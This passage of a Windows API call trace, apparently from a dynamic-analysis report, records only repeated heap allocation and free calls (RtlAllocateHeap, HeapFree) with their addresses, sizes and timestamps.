lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.300] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.300] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.300] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.300] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.301] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.301] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.301] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.301] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.302] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.302] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.302] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.302] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.302] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.302] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0193.303] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.303] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.303] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.303] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.303] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d3a670 [0193.304] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.304] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0193.305] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.305] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.305] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.305] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0193.306] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.306] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.306] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.306] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0193.306] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0193.306] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.306] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.306] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0193.307] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0193.307] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.307] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.307] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.308] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.308] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.308] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.308] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.308] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.308] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.308] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.308] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0193.309] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.309] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.309] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.309] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0193.309] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.310] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.310] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.310] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.310] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.310] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.310] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.310] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.311] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.311] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.311] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.311] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.311] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.312] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.312] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.312] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.312] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.312] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.312] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.312] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.312] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.313] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.313] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.313] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.313] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.314] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.314] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.314] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.314] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.315] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.315] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.315] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.315] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0193.315] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.316] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0193.316] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.316] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.316] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.316] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.317] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.317] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.317] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.317] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc2e) returned 0x2d3a670 [0193.317] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.318] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0193.318] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.318] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0193.318] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0193.318] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.319] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.319] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0193.319] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0193.319] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.319] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.319] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.320] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.320] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.320] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.320] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.320] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.321] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.321] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.321] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.321] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0193.321] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.322] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0193.322] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.322] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.322] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0193.322] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.323] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.323] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.323] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0193.323] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.323] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.323] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.323] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.324] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.324] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.324] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.324] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.324] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.325] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.325] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.325] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.325] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.325] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.326] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.326] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.326] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.326] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.326] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.326] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.327] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.327] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.327] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.327] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.327] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.328] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.328] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.328] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.328] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0193.329] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.329] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0193.329] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.329] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.329] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.330] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.330] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0193.330] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0193.331] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.331] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.331] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0193.331] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d42908 | out: hHeap=0x6a0000) returned 1 [0193.331] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.332] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.332] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.332] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.332] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.332] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.332] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.333] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.333] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.333] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.333] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.333] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0193.333] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.334] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0193.334] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.334] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.334] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0193.334] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.335] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.335] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.335] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x840) returned 0x2d154b0 [0193.335] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.335] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.335] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.336] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.336] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.336] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.336] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.336] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.336] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.337] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.337] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.337] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.337] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.337] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.337] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.338] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.338] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.338] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.338] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.339] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.339] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.339] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.339] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.339] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.340] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.340] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.340] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.340] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.340] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.340] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x830) returned 0x2d154b0 [0193.340] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0xc46) returned 0x2d3a670 [0193.341] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.341] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d3a670 | out: hHeap=0x6a0000) returned 1 [0193.341] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.341] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.341] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x820) returned 0x2d154b0 [0193.342] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x2d154b0 | out: hHeap=0x6a0000) returned 1 [0193.342] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, lpMem=0x6e9a40 | out: hHeap=0x6a0000) returned 1 [0193.342] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x80) returned 0x6e9a40 [0193.342] RtlAllocateHeap (HeapHandle=0x6a0000, Flags=0x0, Size=0x850) returned 0x2d42908 [0193.343] HeapFree (in: hHeap=0x6a0000, dwFlags=0x0, 